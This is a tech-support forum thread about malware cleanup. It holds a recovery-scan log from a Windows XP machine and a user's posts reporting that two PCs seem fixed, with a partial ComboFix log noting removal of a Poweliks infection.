R2 MBAMService; C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe [366152 2011-08-31] (Malwarebytes Corporation)
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-05-31] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2012-01-10] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2012-01-10] (Intuit Inc.) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S3 BVRPMPR5; C:\WINDOWS\system32\drivers\BVRPMPR5.SYS [49904 2009-08-25] (Avanquest Software) [File not signed]
R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [161368 2013-01-10] (ESET)
R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [122240 2013-01-10] (ESET)
R1 epfwtdir; C:\WINDOWS\System32\DRIVERS\epfwtdir.sys [105784 2013-01-10] (ESET)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [12288 2014-01-07] ()
S3 EsgScanner; C:\WINDOWS\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
R3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard)
R3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [176640 2008-06-19] (Broadcom Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [22216 2011-08-31] (Malwarebytes Corporation)
R2 monblanking; C:\WINDOWS\System32\DRIVERS\monblanking.sys [29280 2014-01-30] (Citrix Systems, Inc.)
R0 SFAUDIO; C:\WINDOWS\System32\drivers\sfaudio.sys [24064 2008-07-15] (Sonic Focus, Inc)
U3 .serial; \? [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 13:52 - 2014-09-01 14:15 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Fr
2014-09-01 13:52 - 2014-09-01 13:54 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 13:10 - 2014-09-01 13:09 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-02.dmp
2014-09-01 12:59 - 2014-09-01 12:59 - 00000000 ____D () C:\Qoobox
2014-09-01 12:44 - 2014-09-01 12:44 - 00048250 _____ () C:\Documents and Settings\LW\Desktop\FRST.txt
2014-09-01 12:43 - 2014-09-01 12:43 - 00037157 _____ () C:\Documents and Settings\LW\Desktop\Addition.txt
2014-09-01 12:29 - 2014-09-01 14:15 - 00000000 ____D () C:\FRST
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:38 - 2014-09-01 11:39 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:38 - 2014-09-01 11:39 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 14:13 - 00079339 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 10:57 - 2014-09-01 11:37 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 00:02 - 2014-09-01 13:24 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:53 - 2014-08-31 23:54 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:31 - 2014-08-31 23:43 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:24 - 2014-09-01 10:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:09 - 2014-08-31 21:12 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-09-01 14:02 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-08-31 19:52 - 2014-08-31 23:04 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 19:52 - 2014-08-31 20:27 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 19:52 - 2014-08-31 20:24 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 19:52 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 19:52 - 2009-08-22 04:19 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\PowerDVD DX
2014-08-31 19:52 - 2009-08-22 04:15 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Sun
2014-08-31 19:52 - 2009-08-22 04:14 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Windows Desktop Search
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:26 - 2014-09-01 14:02 - 01114112 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 14:15 - 2014-09-01 13:52 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Fr
2014-09-01 14:15 - 2014-09-01 12:29 - 00000000 ____D () C:\FRST
2014-09-01 14:15 - 2014-01-01 21:55 - 00000416 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job
2014-09-01 14:15 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Temp
2014-09-01 14:13 - 2014-09-01 10:57 - 00079339 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 14:13 - 2008-04-25 12:16 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
2014-09-01 14:12 - 2014-01-01 22:41 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-09-01 14:12 - 2014-01-01 22:41 - 00000048 _____ () C:\WINDOWS\wiaservc.log
2014-09-01 14:12 - 2010-05-25 13:03 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 14:12 - 2010-05-24 19:48 - 00000278 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-09-01 14:12 - 2008-04-25 17:32 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-09-01 14:02 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-09-01 14:02 - 2014-08-31 14:26 - 01114112 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-09-01 14:02 - 2014-01-01 21:50 - 00032452 _____ () C:\WINDOWS\SchedLgU.Txt
2014-09-01 14:02 - 2014-01-01 21:50 - 00000278 ___SH () C:\Documents and Settings\LW\ntuser.ini
2014-09-01 13:59 - 2008-04-25 17:32 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-09-01 13:59 - 2008-04-25 17:32 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Temp
2014-09-01 13:54 - 2014-09-01 13:52 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 13:25 - 2012-06-05 19:32 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-09-01 13:24 - 2014-09-01 00:02 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 13:09 - 2014-09-01 13:10 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-02.dmp
2014-09-01 12:59 - 2014-09-01 12:59 - 00000000 ____D () C:\Qoobox
2014-09-01 12:44 - 2014-09-01 12:44 - 00048250 _____ () C:\Documents and Settings\LW\Desktop\FRST.txt
2014-09-01 12:43 - 2014-09-01 12:43 - 00037157 _____ () C:\Documents and Settings\LW\Desktop\Addition.txt
2014-09-01 12:13 - 2010-05-25 13:03 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:41 - 2014-01-01 22:04 - 00000000 ____D () C:\Documents and Settings\LW\My Documents\QickBooks_Files
2014-09-01 11:41 - 2011-09-01 13:01 - 00000000 ____D () C:\Program Files\Workspace
2014-09-01 11:39 - 2014-09-01 11:38 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:39 - 2014-09-01 11:38 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:39 - 2014-02-04 21:37 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Mozilla
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 11:37 - 2014-09-01 10:57 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 11:23 - 2013-03-22 18:19 - 00000213 ___SH () C:\boot.ini
2014-09-01 11:23 - 2009-12-25 13:47 - 00000000 ____D () C:\WINDOWS\pss
2014-09-01 11:23 - 2008-04-25 12:16 - 00000603 _____ () C:\WINDOWS\win.ini
2014-09-01 11:23 - 2008-04-25 12:16 - 00000227 _____ () C:\WINDOWS\system.ini
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 10:57 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-09-01 10:57 - 2014-02-25 11:09 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-01 10:57 - 2012-07-02 21:03 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-01 10:57 - 2012-01-04 15:53 - 00000000 ____D () C:\WINDOWS\Minidump
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:54 - 2014-08-31 23:53 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:43 - 2014-08-31 23:31 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:31 - 2011-08-28 03:25 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Norton
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 23:04 - 2014-08-31 19:52 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 22:09 - 2014-01-01 21:50 - 00001601 _____ () C:\Documents and Settings\LW\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:37 - 2008-04-25 17:29 - 00001601 _____ () C:\Documents and Settings\Default User\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:20 - 2008-04-25 17:32 - 00001601 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:12 - 2014-08-31 21:09 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:50 - 2009-12-31 18:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ParetoLogic
2014-08-31 20:49 - 2009-12-31 18:33 - 00000000 ____D () C:\Program Files\ParetoLogic
2014-08-31 20:47 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At49.job
2014-08-31 20:27 - 2014-08-31 19:52 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:24 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 20:24 - 2011-03-24 16:51 - 00000684 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:23 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 20:22 - 2010-05-24 19:47 - 00000000 ____D () C:\Program Files\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 15:50 - 2009-08-31 05:33 - 00000000 ____D () C:\WINDOWS\system32\appmgmt
2014-08-31 15:20 - 2014-01-01 21:51 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Amadeus
2014-08-31 14:30 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At51.job
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:21 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\security
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:15 - 2008-04-25 17:34 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-31 14:15 - 2008-04-25 17:25 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-31 14:15 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\Help
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-31 10:15 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job
2014-08-30 18:42 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At50.job
2014-08-30 08:17 - 2013-08-02 12:07 - 00000284 _____ () C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2014-08-29 04:15 - 2009-08-30 17:02 - 00000000 ____D () C:\Program Files\Automatic Update
2014-08-29 01:57 - 2009-12-31 18:36 - 00000380 _____ () C:\WINDOWS\Tasks\DriverCure.job
2014-08-28 20:54 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW
2014-08-27 23:39 - 2014-01-01 22:20 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Intuit
2014-08-27 23:38 - 2010-02-26 15:12 - 00000090 _____ () C:\WINDOWS\QBChanUtil_Trigger.ini
2014-08-27 17:52 - 2010-05-24 19:48 - 00000286 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-08-23 10:28 - 2014-02-13 19:42 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\HpUpdate
2014-08-13 15:13 - 2014-07-24 18:07 - 00001815 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================



#8 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 01:43 PM

I think than PC2 is fixed... maybe it has other issues that it had way before ths one.

But i no longer see all the dll's running anylonger and it works real fast the way it should.

 

I am not sue if it has anyhting to do with me trying COMBOFIX beofre i asked you.

But i did all the steps you gave me after and it seems to work.  Is it just a miricale?



#9 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 01:46 PM

Here is the log file for combo fix on PC 1 and i think its is fixed... Amazing.

 

ComboFix 14-08-31.01 - FD-2 09/01/2014  14:10:56.1.4 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.6046.4579 [GMT -4:00]
Running from: c:\users\FD-2\Desktop\FixStuff\ComboFix.exe
AV: ESET NOD32 Antivirus 6.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 6.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\FD-2\AppData\Roaming\1712912303
c:\users\FD-2\AppData\Roaming\1712912303\2556214959.js
c:\users\FD-2\AppData\Roaming\1712912303\3742126036.js
c:\users\FD-2\AppData\Roaming\1712912303\manifest.json
c:\users\FD-2\AppData\Roaming\2433510085
c:\users\FD-2\AppData\Roaming\2433510085\2556214959.js
c:\users\FD-2\AppData\Roaming\2433510085\3742126036.js
c:\users\FD-2\AppData\Roaming\2433510085\manifest.json
c:\users\FD-2\AppData\Roaming\3353960855
c:\users\FD-2\AppData\Roaming\3473679561
c:\users\FD-2\AppData\Roaming\3617758948
c:\users\FD-2\AppData\Roaming\3713821378
c:\users\FD-2\AppData\Roaming\3878295211
c:\users\FD-2\AppData\Roaming\502041251
c:\users\FD-2\g2ax_customer_downloadhelper_win32_x86.exe
c:\users\FD-2\g2ax_expert_downloadhelper_win32_x86.exe
c:\users\FD-2\GoToAssistDownloadHelper.exe
c:\windows\wininit.ini
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-08-01 to 2014-09-01  )))))))))))))))))))))))))))))))
.
.
2014-09-01 18:24 . 2014-09-01 18:24    --------    d-----w-    c:\users\Default\AppData\Local\temp
2014-09-01 18:21 . 2014-09-01 18:21    75888    ----a-w-    c:\programdata\Microsoft\Windows Defender\Definition Updates\{0E6F2357-A916-4F97-87AE-A7F3DC35357F}\offreg.dll
2014-09-01 05:07 . 2014-09-01 05:07    --------    d-----w-    c:\users\FD-2\AppData\Roaming\KSafe
2014-09-01 05:07 . 2014-09-01 05:07    --------    d-----w-    c:\programdata\KSafe
2014-09-01 05:06 . 2014-09-01 05:06    --------    d-----w-    c:\program files (x86)\DllTool
2014-09-01 04:55 . 2014-09-01 12:41    --------    d-----w-    C:\FRST
2014-08-29 19:54 . 2014-08-21 03:43    11319192    ----a-w-    c:\programdata\Microsoft\Windows Defender\Definition Updates\{0E6F2357-A916-4F97-87AE-A7F3DC35357F}\mpengine.dll
2014-08-28 03:55 . 2014-08-23 02:07    404480    ----a-w-    c:\windows\system32\gdi32.dll
2014-08-28 03:55 . 2014-08-23 01:45    311808    ----a-w-    c:\windows\SysWow64\gdi32.dll
2014-08-28 03:55 . 2014-08-23 00:59    3163648    ----a-w-    c:\windows\system32\win32k.sys
2014-08-27 05:15 . 2014-08-27 05:15    --------    d--h--w-    c:\programdata\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-16 07:00 . 2014-06-30 22:24    8856    ----a-w-    c:\windows\system32\icardres.dll
2014-08-16 07:00 . 2014-06-30 22:14    8856    ----a-w-    c:\windows\SysWow64\icardres.dll
2014-08-16 07:00 . 2014-03-09 21:48    171160    ----a-w-    c:\windows\system32\infocardapi.dll
2014-08-16 07:00 . 2014-03-09 21:48    1389208    ----a-w-    c:\windows\system32\icardagt.exe
2014-08-16 07:00 . 2014-03-09 21:47    99480    ----a-w-    c:\windows\SysWow64\infocardapi.dll
2014-08-16 07:00 . 2014-03-09 21:47    619672    ----a-w-    c:\windows\SysWow64\icardagt.exe
2014-08-16 07:00 . 2014-06-06 06:16    35480    ----a-w-    c:\windows\SysWow64\TsWpfWrp.exe
2014-08-16 07:00 . 2014-06-06 06:12    35480    ----a-w-    c:\windows\system32\TsWpfWrp.exe
2014-08-08 17:46 . 2014-08-08 17:46    --------    d-----w-    c:\users\FD-2\AppData\Roaming\98a319
2014-08-08 17:46 . 2014-08-08 22:23    --------    d-----w-    c:\users\FD-2\AppData\Local\98a319
2014-08-08 17:46 . 2014-08-08 17:47    --------    d-----w-    c:\users\FD-2\AppData\Local\browser_dir
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
